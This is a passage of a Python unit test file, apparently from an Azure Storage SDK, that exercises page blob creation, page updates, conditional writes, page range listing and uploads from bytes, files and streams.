self.assertIsNotNone(resp.sequence_number)
self.assertBlobEqual(self.container_name, blob_name, data)
@record
def test_create_8tb_blob(self):
# Arrange
blob_name = self._get_blob_reference()
# Act
resp = self.bs.create_blob(self.container_name, blob_name, EIGHT_TB)
blob = self.bs.get_blob_properties(self.container_name, blob_name)
ranges = self.bs.get_page_ranges(self.container_name, blob_name)
# Assert
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
self.assertIsInstance(blob, Blob)
self.assertEqual(blob.properties.content_length, EIGHT_TB)
self.assertEqual(0, len(ranges))
@record
def test_create_larger_than_8tb_blob_fail(self):
# Arrange
blob_name = self._get_blob_reference()
# Act
with self.assertRaises(AzureHttpError):
self.bs.create_blob(self.container_name, blob_name, EIGHT_TB + 1)
@record
def test_update_8tb_blob_page(self):
# Arrange
blob_name = self._get_blob_reference()
self.bs.create_blob(self.container_name, blob_name, EIGHT_TB)
# Act
data = self.get_random_bytes(512)
start_range = EIGHT_TB - 512
end_range = EIGHT_TB - 1
resp = self.bs.update_page(self.container_name, blob_name, data, start_range, end_range)
blob = self.bs.get_blob_properties(self.container_name, blob_name)
ranges = self.bs.get_page_ranges(self.container_name, blob_name)
# Assert
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
self.assertIsNotNone(resp.sequence_number)
self.assertRangeEqual(self.container_name, blob_name, data, start_range, end_range)
self.assertEqual(blob.properties.content_length, EIGHT_TB)
self.assertEqual(1, len(ranges))
self.assertEqual(ranges[0].start, start_range)
self.assertEqual(ranges[0].end, end_range)
@record
def test_update_page_with_md5(self):
# Arrange
blob_name = self._create_blob()
# Act
data = self.get_random_bytes(512)
resp = self.bs.update_page(self.container_name, blob_name, data, 0, 511,
validate_content=True)
# Assert
@record
def test_clear_page(self):
# Arrange
blob_name = self._create_blob()
# Act
resp = self.bs.clear_page(self.container_name, blob_name, 0, 511)
# Assert
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
self.assertIsNotNone(resp.sequence_number)
self.assertBlobEqual(self.container_name, blob_name, b'\x00' * 512)
@record
def test_put_page_if_sequence_number_lt_success(self):
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(512)
start_sequence = 10
self.bs.create_blob(self.container_name, blob_name, 512, sequence_number=start_sequence)
# Act
self.bs.update_page(self.container_name, blob_name, data, 0, 511,
if_sequence_number_lt=start_sequence + 1)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
@record
def test_update_page_if_sequence_number_lt_failure(self):
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(512)
start_sequence = 10
self.bs.create_blob(self.container_name, blob_name, 512, sequence_number=start_sequence)
# Act
with self.assertRaises(AzureHttpError):
self.bs.update_page(self.container_name, blob_name, data, 0, 511,
if_sequence_number_lt=start_sequence)
# Assert
@record
def test_update_page_if_sequence_number_lte_success(self):
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(512)
start_sequence = 10
self.bs.create_blob(self.container_name, blob_name, 512, sequence_number=start_sequence)
# Act
self.bs.update_page(self.container_name, blob_name, data, 0, 511,
if_sequence_number_lte=start_sequence)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
@record
def test_update_page_if_sequence_number_lte_failure(self):
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(512)
start_sequence = 10
self.bs.create_blob(self.container_name, blob_name, 512, sequence_number=start_sequence)
# Act
with self.assertRaises(AzureHttpError):
self.bs.update_page(self.container_name, blob_name, data, 0, 511,
if_sequence_number_lte=start_sequence - 1)
# Assert
@record
def test_update_page_if_sequence_number_eq_success(self):
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(512)
start_sequence = 10
self.bs.create_blob(self.container_name, blob_name, 512, sequence_number=start_sequence)
# Act
self.bs.update_page(self.container_name, blob_name, data, 0, 511,
if_sequence_number_eq=start_sequence)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
@record
def test_update_page_if_sequence_number_eq_failure(self):
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(512)
start_sequence = 10
self.bs.create_blob(self.container_name, blob_name, 512,
sequence_number=start_sequence)
# Act
with self.assertRaises(AzureHttpError):
self.bs.update_page(self.container_name, blob_name, data, 0, 511,
if_sequence_number_eq=start_sequence - 1)
# Assert
@record
def test_update_page_unicode(self):
# Arrange
blob_name = self._create_blob()
# Act
data = u'abcdefghijklmnop' * 32
with self.assertRaises(TypeError):
self.bs.update_page(self.container_name, blob_name, data, 0, 511)
# Assert
@record
def test_update_page_from_url(self):
# Arrange
dest_blob_name = self.get_resource_name('destblob')
self.bs.create_blob(self.container_name, dest_blob_name, SOURCE_BLOB_SIZE)
# Act: make update page from url calls
resp = self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0, end_range=4 * 1024 - 1,
copy_source_url=self.source_blob_url, source_range_start=0)
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
resp = self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=4 * 1024,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=4 * 1024)
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
# Assert the destination blob is constructed correctly
blob = self.bs.get_blob_properties(self.container_name, dest_blob_name)
self.assertBlobEqual(self.container_name, dest_blob_name, self.source_blob_data)
self.assertEqual(blob.properties.etag, resp.etag)
self.assertEqual(blob.properties.last_modified, resp.last_modified)
@record
def test_update_page_from_url_and_validate_content_md5(self):
# Arrange
src_md5 = _get_content_md5(self.source_blob_data)
dest_blob_name = self.get_resource_name('destblob')
self.bs.create_blob(self.container_name, dest_blob_name, SOURCE_BLOB_SIZE)
# Act part 1: make update page from url calls with correct md5
resp = self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0, source_content_md5=src_md5)
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
# Assert the destination blob is constructed correctly
blob = self.bs.get_blob_properties(self.container_name, dest_blob_name)
self.assertBlobEqual(self.container_name, dest_blob_name, self.source_blob_data)
self.assertEqual(blob.properties.etag, resp.etag)
self.assertEqual(blob.properties.last_modified, resp.last_modified)
# Act part 2: put block from url with wrong md5
with self.assertRaises(AzureHttpError):
self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0, source_content_md5=_get_content_md5(b"POTATO"))
@record
def test_update_page_from_url_with_source_if_modified(self):
# Arrange
dest_blob_name = self.get_resource_name('destblob')
resource_properties = self.bs.create_blob(self.container_name, dest_blob_name, SOURCE_BLOB_SIZE)
# Act part 1: make update page from url calls
resp = self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0,
source_if_modified_since=resource_properties.last_modified - timedelta(
hours=15))
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
# Assert the destination blob is constructed correctly
blob = self.bs.get_blob_properties(self.container_name, dest_blob_name)
self.assertBlobEqual(self.container_name, dest_blob_name, self.source_blob_data)
self.assertEqual(blob.properties.etag, resp.etag)
self.assertEqual(blob.properties.last_modified, resp.last_modified)
# Act part 2: put block from url with failing condition
with self.assertRaises(AzureHttpError):
self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0,
source_if_modified_since=resource_properties.last_modified)
@record
def test_update_page_from_url_with_source_if_unmodified(self):
# Arrange
dest_blob_name = self.get_resource_name('destblob')
resource_properties = self.bs.create_blob(self.container_name, dest_blob_name, SOURCE_BLOB_SIZE)
# Act part 1: make update page from url calls
resp = self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0,
source_if_unmodified_since=resource_properties.last_modified)
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
# Assert the destination blob is constructed correctly
blob = self.bs.get_blob_properties(self.container_name, dest_blob_name)
self.assertBlobEqual(self.container_name, dest_blob_name, self.source_blob_data)
self.assertEqual(blob.properties.etag, resp.etag)
self.assertEqual(blob.properties.last_modified, resp.last_modified)
# Act part 2: put block from url with failing condition
with self.assertRaises(AzureHttpError):
self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0,
if_unmodified_since=resource_properties.last_modified - timedelta(
hours=15))
@record
def test_update_page_from_url_with_source_if_match(self):
# Arrange
dest_blob_name = self.get_resource_name('destblob')
self.bs.create_blob(self.container_name, dest_blob_name, SOURCE_BLOB_SIZE)
src_blob_resource_properties = self.bs.get_blob_properties(self.container_name,
self.source_blob_name).properties
# Act part 1: make update page from url calls
resp = self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0, source_if_match=src_blob_resource_properties.etag)
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
# Assert the destination blob is constructed correctly
blob = self.bs.get_blob_properties(self.container_name, dest_blob_name)
self.assertBlobEqual(self.container_name, dest_blob_name, self.source_blob_data)
self.assertEqual(blob.properties.etag, resp.etag)
self.assertEqual(blob.properties.last_modified, resp.last_modified)
# Act part 2: put block from url with failing condition
with self.assertRaises(AzureHttpError):
self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0, source_if_match='0x111111111111111')
@record
def test_update_page_from_url_with_source_if_none_match(self):
# Arrange
dest_blob_name = self.get_resource_name('destblob')
self.bs.create_blob(self.container_name, dest_blob_name, SOURCE_BLOB_SIZE)
src_blob_resource_properties = self.bs.get_blob_properties(self.container_name,
self.source_blob_name).properties
# Act part 1: make update page from url calls
resp = self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0, source_if_none_match='0x111111111111111')
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
# Assert the destination blob is constructed correctly
blob = self.bs.get_blob_properties(self.container_name, dest_blob_name)
self.assertBlobEqual(self.container_name, dest_blob_name, self.source_blob_data)
self.assertEqual(blob.properties.etag, resp.etag)
self.assertEqual(blob.properties.last_modified, resp.last_modified)
# Act part 2: put block from url with failing condition
with self.assertRaises(AzureHttpError):
self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0, source_if_none_match=src_blob_resource_properties.etag)
@record
def test_update_page_from_url_with_if_modified(self):
# Arrange
dest_blob_name = self.get_resource_name('destblob')
resource_properties = self.bs.create_blob(self.container_name, dest_blob_name, SOURCE_BLOB_SIZE)
# Act part 1: make update page from url calls
resp = self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0,
if_modified_since=resource_properties.last_modified - timedelta(
minutes=15))
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
# Assert the destination blob is constructed correctly
blob = self.bs.get_blob_properties(self.container_name, dest_blob_name)
self.assertBlobEqual(self.container_name, dest_blob_name, self.source_blob_data)
self.assertEqual(blob.properties.etag, resp.etag)
self.assertEqual(blob.properties.last_modified, resp.last_modified)
# Act part 2: put block from url with failing condition
with self.assertRaises(AzureHttpError):
# make sure sufficient time has passed
if not self.is_playback():
self.sleep(2)
self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0, if_modified_since=resource_properties.last_modified)
@record
def test_update_page_from_url_with_if_unmodified(self):
# Arrange
dest_blob_name = self.get_resource_name('destblob')
resource_properties = self.bs.create_blob(self.container_name, dest_blob_name, SOURCE_BLOB_SIZE)
# Act part 1: make update page from url calls
resp = self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0, if_unmodified_since=resource_properties.last_modified)
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
# Assert the destination blob is constructed correctly
blob = self.bs.get_blob_properties(self.container_name, dest_blob_name)
self.assertBlobEqual(self.container_name, dest_blob_name, self.source_blob_data)
self.assertEqual(blob.properties.etag, resp.etag)
self.assertEqual(blob.properties.last_modified, resp.last_modified)
# Act part 2: put block from url with failing condition
with self.assertRaises(AzureHttpError):
self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0,
if_unmodified_since=resource_properties.last_modified - timedelta(
minutes=15))
@record
def test_update_page_from_url_with_if_match(self):
# Arrange
dest_blob_name = self.get_resource_name('destblob')
resource_properties = self.bs.create_blob(self.container_name, dest_blob_name, SOURCE_BLOB_SIZE)
# Act part 1: make update page from url calls
resp = self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0, if_match=resource_properties.etag)
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
# Assert the destination blob is constructed correctly
blob = self.bs.get_blob_properties(self.container_name, dest_blob_name)
self.assertBlobEqual(self.container_name, dest_blob_name, self.source_blob_data)
self.assertEqual(blob.properties.etag, resp.etag)
self.assertEqual(blob.properties.last_modified, resp.last_modified)
# Act part 2: put block from url with failing condition
with self.assertRaises(AzureHttpError):
self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0, if_match='0x111111111111111')
@record
def test_update_page_from_url_with_if_none_match(self):
# Arrange
dest_blob_name = self.get_resource_name('destblob')
self.bs.create_blob(self.container_name, dest_blob_name, SOURCE_BLOB_SIZE)
# Act part 1: make update page from url calls
resp = self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0, if_none_match='0x111111111111111')
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
# Assert the destination blob is constructed correctly
blob = self.bs.get_blob_properties(self.container_name, dest_blob_name)
self.assertBlobEqual(self.container_name, dest_blob_name, self.source_blob_data)
self.assertEqual(blob.properties.etag, resp.etag)
self.assertEqual(blob.properties.last_modified, resp.last_modified)
# Act part 2: put block from url with failing condition
with self.assertRaises(AzureHttpError):
self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0, if_none_match=blob.properties.etag)
@record
def test_update_page_from_url_with_sequence_number_lt(self):
# Arrange
start_sequence = 10
dest_blob_name = self.get_resource_name('destblob')
self.bs.create_blob(self.container_name, dest_blob_name, SOURCE_BLOB_SIZE, sequence_number=start_sequence)
# Act part 1: make update page from url calls
resp = self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0, if_sequence_number_lt=start_sequence + 1)
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
# Assert the destination blob is constructed correctly
blob = self.bs.get_blob_properties(self.container_name, dest_blob_name)
self.assertBlobEqual(self.container_name, dest_blob_name, self.source_blob_data)
self.assertEqual(blob.properties.etag, resp.etag)
self.assertEqual(blob.properties.last_modified, resp.last_modified)
# Act part 2: put block from url with failing condition
with self.assertRaises(AzureHttpError):
self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0, if_sequence_number_lt=start_sequence)
@record
def test_update_page_from_url_with_sequence_number_lte(self):
# Arrange
start_sequence = 10
dest_blob_name = self.get_resource_name('destblob')
self.bs.create_blob(self.container_name, dest_blob_name, SOURCE_BLOB_SIZE, sequence_number=start_sequence)
# Act part 1: make update page from url calls
resp = self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0, if_sequence_number_lte=start_sequence)
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
# Assert the destination blob is constructed correctly
blob = self.bs.get_blob_properties(self.container_name, dest_blob_name)
self.assertBlobEqual(self.container_name, dest_blob_name, self.source_blob_data)
self.assertEqual(blob.properties.etag, resp.etag)
self.assertEqual(blob.properties.last_modified, resp.last_modified)
# Act part 2: put block from url with failing condition
with self.assertRaises(AzureHttpError):
self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0, if_sequence_number_lte=start_sequence - 1)
@record
def test_update_page_from_url_with_sequence_number_eq(self):
# Arrange
start_sequence = 10
dest_blob_name = self.get_resource_name('destblob')
self.bs.create_blob(self.container_name, dest_blob_name, SOURCE_BLOB_SIZE, sequence_number=start_sequence)
# Act part 1: make update page from url calls
resp = self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0, if_sequence_number_eq=start_sequence)
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
# Assert the destination blob is constructed correctly
blob = self.bs.get_blob_properties(self.container_name, dest_blob_name)
self.assertBlobEqual(self.container_name, dest_blob_name, self.source_blob_data)
self.assertEqual(blob.properties.etag, resp.etag)
self.assertEqual(blob.properties.last_modified, resp.last_modified)
# Act part 2: put block from url with failing condition
with self.assertRaises(AzureHttpError):
self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0, if_sequence_number_eq=start_sequence + 1)
@record
def test_get_page_ranges_no_pages(self):
# Arrange
blob_name = self._create_blob()
# Act
ranges = self.bs.get_page_ranges(self.container_name, blob_name)
# Assert
self.assertIsNotNone(ranges)
self.assertIsInstance(ranges, list)
self.assertEqual(len(ranges), 0)
@record
def test_get_page_ranges_2_pages(self):
# Arrange
blob_name = self._create_blob(2048)
data = self.get_random_bytes(512)
resp1 = self.bs.update_page(self.container_name, blob_name, data, 0, 511)
resp2 = self.bs.update_page(self.container_name, blob_name, data, 1024, 1535)
# Act
ranges = self.bs.get_page_ranges(self.container_name, blob_name)
# Assert
self.assertIsNotNone(ranges)
self.assertIsInstance(ranges, list)
self.assertEqual(len(ranges), 2)
self.assertEqual(ranges[0].start, 0)
self.assertEqual(ranges[0].end, 511)
self.assertEqual(ranges[1].start, 1024)
self.assertEqual(ranges[1].end, 1535)
@record
def test_get_page_ranges_diff(self):
# Arrange
blob_name = self._create_blob(2048)
data = self.get_random_bytes(1536)
snapshot1 = self.bs.snapshot_blob(self.container_name, blob_name)
self.bs.update_page(self.container_name, blob_name, data, 0, 1535)
snapshot2 = self.bs.snapshot_blob(self.container_name, blob_name)
self.bs.clear_page(self.container_name, blob_name, 512, 1023)
# Act
ranges1 = self.bs.get_page_ranges_diff(self.container_name, blob_name, snapshot1.snapshot)
ranges2 = self.bs.get_page_ranges_diff(self.container_name, blob_name, snapshot2.snapshot)
# Assert
self.assertIsNotNone(ranges1)
self.assertIsInstance(ranges1, list)
self.assertEqual(len(ranges1), 3)
self.assertEqual(ranges1[0].is_cleared, False)
self.assertEqual(ranges1[0].start, 0)
self.assertEqual(ranges1[0].end, 511)
self.assertEqual(ranges1[1].is_cleared, True)
self.assertEqual(ranges1[1].start, 512)
self.assertEqual(ranges1[1].end, 1023)
self.assertEqual(ranges1[2].is_cleared, False)
self.assertEqual(ranges1[2].start, 1024)
self.assertEqual(ranges1[2].end, 1535)
self.assertIsNotNone(ranges2)
self.assertIsInstance(ranges2, list)
self.assertEqual(len(ranges2), 1)
self.assertEqual(ranges2[0].is_cleared, True)
self.assertEqual(ranges2[0].start, 512)
self.assertEqual(ranges2[0].end, 1023)
@record
def test_update_page_fail(self):
# Arrange
blob_name = self._create_blob(2048)
data = self.get_random_bytes(512)
resp1 = self.bs.update_page(self.container_name, blob_name, data, 0, 511)
# Act
try:
self.bs.update_page(self.container_name, blob_name, data, 1024, 1536)
except ValueError as e:
self.assertEqual(str(e), 'end_range must align with 512 page size')
return
# Assert
raise Exception('Page range validation failed to throw on failure case')
@record
def test_resize_blob(self):
# Arrange
blob_name = self._create_blob(1024)
# Act
resp = self.bs.resize_blob(self.container_name, blob_name, 512)
# Assert
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
self.assertIsNotNone(resp.sequence_number)
blob = self.bs.get_blob_properties(self.container_name, blob_name)
self.assertIsInstance(blob, Blob)
self.assertEqual(blob.properties.content_length, 512)
@record
def test_set_sequence_number_blob(self):
# Arrange
blob_name = self._create_blob()
# Act
resp = self.bs.set_sequence_number(self.container_name, blob_name, SequenceNumberAction.Update, 6)
# Assert
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
self.assertIsNotNone(resp.sequence_number)
blob = self.bs.get_blob_properties(self.container_name, blob_name)
self.assertIsInstance(blob, Blob)
self.assertEqual(blob.properties.page_blob_sequence_number, 6)
def test_create_blob_from_bytes(self):
# parallel tests introduce random order of requests, can only run live
if TestMode.need_recording_file(self.test_mode):
return
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(LARGE_BLOB_SIZE)
# Act
create_resp = self.bs.create_blob_from_bytes(self.container_name, blob_name, data)
blob = self.bs.get_blob_properties(self.container_name, blob_name)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
self.assertEqual(blob.properties.etag, create_resp.etag)
self.assertEqual(blob.properties.last_modified, create_resp.last_modified)
def test_create_blob_from_0_bytes(self):
# parallel tests introduce random order of requests, can only run live
if TestMode.need_recording_file(self.test_mode):
return
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(0)
# Act
create_resp = self.bs.create_blob_from_bytes(self.container_name, blob_name, data)
blob = self.bs.get_blob_properties(self.container_name, blob_name)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
self.assertEqual(blob.properties.etag, create_resp.etag)
self.assertEqual(blob.properties.last_modified, create_resp.last_modified)
def test_create_blob_from_bytes_with_progress(self):
# parallel tests introduce random order of requests, can only run live
if TestMode.need_recording_file(self.test_mode):
return
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(LARGE_BLOB_SIZE)
# Act
progress = []
def callback(current, total):
progress.append((current, total))
create_resp = self.bs.create_blob_from_bytes(self.container_name, blob_name, data, progress_callback=callback)
blob = self.bs.get_blob_properties(self.container_name, blob_name)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
self.assertEqual(blob.properties.etag, create_resp.etag)
self.assertEqual(blob.properties.last_modified, create_resp.last_modified)
def test_create_blob_from_bytes_with_index(self):
# parallel tests introduce random order of requests, can only run live
if TestMode.need_recording_file(self.test_mode):
return
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(LARGE_BLOB_SIZE)
index = 1024
# Act
self.bs.create_blob_from_bytes(self.container_name, blob_name, data, index)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data[1024:])
@record
def test_create_blob_from_bytes_with_index_and_count(self):
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(LARGE_BLOB_SIZE)
index = 512
count = 1024
# Act
create_resp = self.bs.create_blob_from_bytes(self.container_name, blob_name, data, index, count)
blob = self.bs.get_blob_properties(self.container_name, blob_name)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data[index:index + count])
self.assertEqual(blob.properties.etag, create_resp.etag)
self.assertEqual(blob.properties.last_modified, create_resp.last_modified)
def test_create_blob_from_path(self):
# parallel tests introduce random order of requests, can only run live
if TestMode.need_recording_file(self.test_mode):
return
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(LARGE_BLOB_SIZE)
FILE_PATH = 'blob_input.temp.dat'
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
create_resp = self.bs.create_blob_from_path(self.container_name, blob_name, FILE_PATH)
blob = self.bs.get_blob_properties(self.container_name, blob_name)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
self.assertEqual(blob.properties.etag, create_resp.etag)
self.assertEqual(blob.properties.last_modified, create_resp.last_modified)
def test_create_blob_from_path_with_progress(self):
# parallel tests introduce random order of requests, can only run live
if TestMode.need_recording_file(self.test_mode):
return
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(LARGE_BLOB_SIZE)
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
progress = []
def callback(current, total):
progress.append((current, total))
self.bs.create_blob_from_path(self.container_name, blob_name, FILE_PATH, progress_callback=callback)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
self.assert_upload_progress(len(data), self.bs.MAX_PAGE_SIZE, progress)
def test_create_blob_from_stream(self):
# parallel tests introduce random order of requests, can only run live
if TestMode.need_recording_file(self.test_mode):
return
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(LARGE_BLOB_SIZE)
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
blob_size = len(data)
with open(FILE_PATH, 'rb') as stream:
create_resp = self.bs.create_blob_from_stream(self.container_name, blob_name, stream, blob_size)
blob = self.bs.get_blob_properties(self.container_name, blob_name)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data[:blob_size])
self.assertEqual(blob.properties.etag, create_resp.etag)
self.assertEqual(blob.properties.last_modified, create_resp.last_modified)
def test_create_blob_from_stream_with_empty_pages(self):
# parallel tests introduce random order of requests, can only run live
if TestMode.need_recording_file(self.test_mode):
return
# Arrange
# data is almost all empty (0s) except two ranges
blob_name = self._get_blob_reference()
data = bytearray(LARGE_BLOB_SIZE)
data[512: 1024] = self.get_random_bytes(512)
data[8192: 8196] = self.get_random_bytes(4)
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
blob_size = len(data)
with open(FILE_PATH, 'rb') as stream:
create_resp = self.bs.create_blob_from_stream(self.container_name, blob_name, stream, blob_size)
blob = self.bs.get_blob_properties(self.container_name, blob_name)
# Assert
# the uploader should have skipped the empty ranges
self.assertBlobEqual(self.container_name, blob_name, data[:blob_size])
page_ranges = list(self.bs.get_page_ranges(self.container_name, blob_name))
self.assertEqual(len(page_ranges), 2)
self.assertEqual(page_ranges[0].start, 0)
self.assertEqual(page_ranges[0].end, 4095)
self.assertEqual(page_ranges[1].start, 8192)
self.assertEqual(page_ranges[1].end, 12287)
self.assertEqual(blob.properties.etag, create_resp.etag)
self.assertEqual(blob.properties.last_modified, create_resp.last_modified)
def test_create_blob_from_stream_non_seekable(self):
# parallel tests introduce random order of requests, can only run live
if TestMode.need_recording_file(self.test_mode):
return
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(LARGE_BLOB_SIZE)
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
blob_size = len(data)
with open(FILE_PATH, 'rb') as stream:
non_seekable_file = StoragePageBlobTest.NonSeekableFile(stream)
self.bs.create_blob_from_stream(self.container_name, blob_name, non_seekable_file, blob_size,
max_connections=1)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data[:blob_size])
def test_create_blob_from_stream_with_progress(self):
# parallel tests introduce random order of requests, can only run live
if TestMode.need_recording_file(self.test_mode):
return
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(LARGE_BLOB_SIZE)
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
progress = []
def callback(current, total):
progress.append((current, total))
blob_size = len(data)
with open(FILE_PATH, 'rb') as stream:
self.bs.create_blob_from_stream(self.container_name, blob_name, stream, blob_size,
progress_callback=callback)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data[:blob_size])
self.assert_upload_progress(len(data), self.bs.MAX_PAGE_SIZE, progress)
def test_create_blob_from_stream_truncated(self):
# parallel tests introduce random order of requests, can only run live
if TestMode.need_recording_file(self.test_mode):
return
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(LARGE_BLOB_SIZE)
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
blob_size = len(data) - 512
with open(FILE_PATH, 'rb') as stream:
self.bs.create_blob_from_stream(self.container_name, blob_name, stream, blob_size)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data[:blob_size])
def test_create_blob_from_stream_with_progress_truncated(self):
# parallel tests introduce random order of requests, can only run live
if TestMode.need_recording_file(self.test_mode):
return
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(LARGE_BLOB_SIZE)
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
progress = []
def callback(current, total):
progress.append((current, total))
blob_size = len(data) - 512
with open(FILE_PATH, 'rb') as stream:
self.bs.create_blob_from_stream(self.container_name, blob_name, stream, blob_size,
progress_callback=callback)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data[:blob_size])
self.assert_upload_progress(blob_size, self.bs.MAX_PAGE_SIZE, progress)
@record
